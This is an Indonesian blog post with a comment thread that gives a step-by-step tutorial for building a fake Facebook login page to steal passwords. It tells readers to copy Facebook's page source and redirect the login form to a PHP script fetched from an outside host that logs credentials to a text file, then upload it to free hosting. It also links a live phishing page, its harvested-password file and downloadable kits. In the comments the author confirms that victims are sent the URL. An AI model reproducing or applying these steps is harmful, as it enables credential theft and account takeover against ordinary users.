http://aljeeran.net/thumbnail.php?file=hack_facebook_account_online_939191810.jpg&size=article_medium



















Sesuai judul di atas saya akan membuat tutorial cara membuat script fake login facebook/phising...

Tutorial ini mungkin dah basi bagi para suhu2...

tapi untuk melengkapi blog ini, dan sebagai pengetahuan untuk yang lain..

ok pertama kita harus tau dulu apa itu fake login?

fake login terdiri dari dari dua kata yaitu : Fake dan Login. Fake artinya palsu dan login artinya masuk. Jadi yang dimaksud dengan fake login adalah halaman palsu untuk masuk (login) ke akun/halaman website tertentu, misal facebook, friendster, blog dan lain-lain. Fake login ini sering di gunakan oleh para hacker untuk membobol password tertentu.

simplenya ini membuat alamat palsu seperti ayu ting-ting..hahay...

nah sekarang saya akan membahas untuk membuat fake login facebook...

1.Membuat file facebook.php

Pertama masuk ke www.facebook.com dengan browser/mozilla, setelah halaman login facebook muncul tekan Ctrl+u pada keyboard agan, nanti akan muncul page source code..

copy paste semua codenya kedalam notepad...

nah sekarang kita rubah agar menjadi fake login..

pada notepad barusan yang berisi code tekan Ctrl+f lalu masukan/cari

https://www.facebook.com/login.php?login_attempt=1

setelah ketemu ganti dengan jhn.php, jika sudah save,

jangan lupa d save dengan namafacebook.php agar lebih mayakinkan,

awas jgn save dengan extensi .txt..

2.Membuat file jhn.php
Buka notepad baru lalu buka ini http://jakeng.xtreemhost.com/jhn.txt 
copy dan paste pada notepad lalu save dengan nama jhn.php
 
3. Membuat hasil_hack.txt
         buka lagi notepad baru tidak usah di isi apa2, cukup save saja dengan nama
hasil_hack.txt ...

selesai tinggal di uploadkan 3 file tadi ke webhost masing2..
jika ga mau ribet bikin, saya sudah siapkan 3 file td , tinggal di download DISINI 
mungkin di tutorial selanjutnya akan saya buatkan cara uploadnya..
ok sekian dl, semoga bermanfaat...

Update :

jika ingin memakai fake login punya saya silahkan..
fake login : http://jakeng.xtreemhost.com/facebook.php
melihat password : http://jakeng.xtreemhost.com/hasil_hack.txt
:D

53 komentar:

Edy Sant mengatakan...

wahh langsung ane coba, susah ya hehehe :D

RifaL mengatakan...

hehehe kl mau gampang ada tuh yg dh jadi kang :))

ZONA DOWNLOAD GRATIS mengatakan...

cara upload ke hostingnya bisa segera dishare, kl bisa yg gratis.

RifaL mengatakan...

siap om, sabar ya,sbuk krmarin..hehehe :D
mksh kunjungannya

Liandri eko mengatakan...

wah ternyata ini blognya mas rifal, blog baru nie ane kemari gak tau kalau punya ente sob.
kmn aja ne baru nongol?

RifaL mengatakan...

sibuk mas hehehehehe :D
ini jg mumpung lg smanget post lg hehehe...

rajib mengatakan...

share lebih banyak mas...hehe

RifaL mengatakan...

share apa ya mas, saya jg bingung haha..

giri AconK mengatakan...

thankss ya mass atas info nya

RifaL mengatakan...

sama2 mas :)

Rednockp mengatakan...

wah keren nih, apa masih bisa dipakai sampai sekarang???
kunjung2 ke blog saya
http://www.jsssintang.blogspot.com

RifaL mengatakan...

@Rednockp : bisa mas..cuma yang harus kita cari cuma webhosting gratis aja..kebanyakan jika ketauan ada script facebook langsung di suspend..
tinggal cari2 aja webhosting gratis yang lain..

ok d tunggu aja kunjungannya :D

Yuridi bintang pratama mengatakan...

kalo udah di upload terus gimana mas ?

RifaL mengatakan...

@yuridi..alanmat hostingan agan apa?
misalkan, http://jakeng.xtreemhost.com/ tambahkan facebook.php di belakangnya..jadi http://jakeng.xtreemhost.com/facebook.php.. :)

ryan mengatakan...

gk ngerti gan, gmn cra uploadx n mlihat hsil hackx
8-}

RifaL mengatakan...

ryan : coba di baca lagi.. :D
jawaban dari pertanyaannya sudah ada..

Anonim mengatakan...

uhhh... mksih ya.. gw coba dulu maz broww =))

RifaL mengatakan...

silahkan masbrooo.... :D

D1K4 K43R14 R34NZ4 mengatakan...

Not Workin' Kang...

RifaL mengatakan...

silahkan cari hosting yg lain..saya dan teman2 sudah sering coba...1000% work

Anonim mengatakan...

isi jhn.php nya apa bro ? ga bisa masuk di link http://jakeng.xtreemhost.com/jhn.txt nya :(

Dabllink mengatakan...

yang jakeng.xtreemhost itu cm contoh fake login yang sudah jadi buatan saya...sekarang udah d blokir..jadi silahkan bkin sendiri..ikuti tutor di atas :)

Kuro hige mengatakan...

haduh gan ribet juga ya.....

Dabllink mengatakan...

ngga jg..cuma tinggal upload doank.. :)

Rudy mengatakan...

mas saya kemarin di fack login sma seseorang

Rudy mengatakan...

tlong ajarin saya gimana cara y?

Dabllink mengatakan...

itu d atas cara2nya,,,silahkan d baca

Yayasan Yapirru mengatakan...
Komentar ini telah dihapus oleh penulis.
Yayasan Yapirru mengatakan...

Masih bingung penjelasan diatas gan...
gw pengen blog gw Disini bs pakai login facebook sprti yg Agan maksud tuch.
Boleh tahu No. Hp nya ngga Gan? Makasih :)]

Dabllink mengatakan...

@agan yayasan : ini d upload pada hostingan gan bukan Blog :)

Muehammad Yuezha Andrean mengatakan...

Boleh nih gan dicoba!
Langsung aja deh ;)
Bye =))

Dabllink mengatakan...

monggo gan, makasih dah berkunjung :D

Anwar Scr ™ mengatakan...

wleh wleh... ribet gan...
ane ngk tau cara kerjanya

Dabllink mengatakan...

ribet kl blm d coba...
tinggal daftar hosting terus download aja scriptnya kl gmw ribet...upload deh, udah beres..

Oekas mengatakan...

maksud tutorial ke 2 yang harus kita buka http://jakeng.xtreemhost.com/jhn.txt trus kita simpen..
simpan apanya ni mas ??
page source nya ya ??

Dabllink mengatakan...

@okeas dl ada source disitu, dikarenakan sudah d blokir, ambil simplenya aja...
agan download yg ada tulisan "disini"..
lalgu agan upload di hostingan...selesai,,

Jeje mengatakan...

Yg Mau Fake Login (Phising) FB langsung jadi silahkan : http://adf.ly/9IkLy

Tempat Passwordnya : http://adf.ly/9Ijrn

Silahkan digunakan Sebijak Mungkin Hv Fun Day :D

fifa mengatakan...

cara menjebak korban masuk ke fake login kita gimana gan.?

Anonim mengatakan...

ane klik disini dwnload hslnya 4Shared,,cara tau password korbannya d kolom apa gan?

tweet mengatakan...

kalo mau tau pasword korban nya ada di phpmyadmin di hostingan kalian masing masing maaf nih saya menambahkan biar sekalian lengkap heheheheh salam bloger

tweet mengatakan...

jeje itumah scrypt fb lama sekarang udah di perbaharui lagi

ryan rizqi mengatakan...

trus gmn bro??
kasih korban alamat hasil upload??

Dabllink mengatakan...

@ryan, iya :)

agus mengatakan...

hai boz,mau tanya..klo webhosting yg mendukung web yg mana boz,yg gratisan???

Anonim mengatakan...

bro gue udh brhsil buat tampilnx n brhsil upload file, tp ketika dicoba memangg sukses terbuka tp ketika download hasil .txt nya kok tdk ad password yg didapat yah, cuma muncul tulisan eroro di notepadnya. bantuannya dong

chu konk mengatakan...

sy msh blm phm gan, klo pke hp bs bkin fake login g

Anonim mengatakan...

sialan...virus semua di script-nya euy..

vallen adie mengatakan...

YANG GRATIS NGHA ADA APA BANG....
http://eventonlinegemscool.comoj.com/ ABANG BISA BIKIN SEPERTI INI KALO BISA INBOX KE SINI http://www.facebook.com/adievallen20 SOAL ONGKOS GAMPANG :D

Dabllink mengatakan...

@anonim : hahaha sory gua harus bilang GOBLOK sama lu ! hahaha =)) script html sama php doang lu bilang virus??? wakakakak pengen di bilang programer tapi otak dangkal..

@vallen..tar ane message..

Anonim mengatakan...

Om , blog yg kmu buat apakah masi bisa ?

Anonim mengatakan...

Om , blog yg kmu buat apakah masi bisa d pakai ?
by : Norman

dhino prima mengatakan...

mantap gan,,,
www.informasiunik.com

jannu radoz mengatakan...

keren mang saya mau izin follow tapi gmana ya ga ada tulisannya :D

Poskan Komentar

:)) :)] ;)) ;;) :D ;) :p :(( :) :( :X =(( :-o :-/ :-* : 8-} ~x( :-t b-( :-L x( =))

Copyright 2010 Blog Iseng
Suported by : Indonesia lost-c0de™ > ID-10t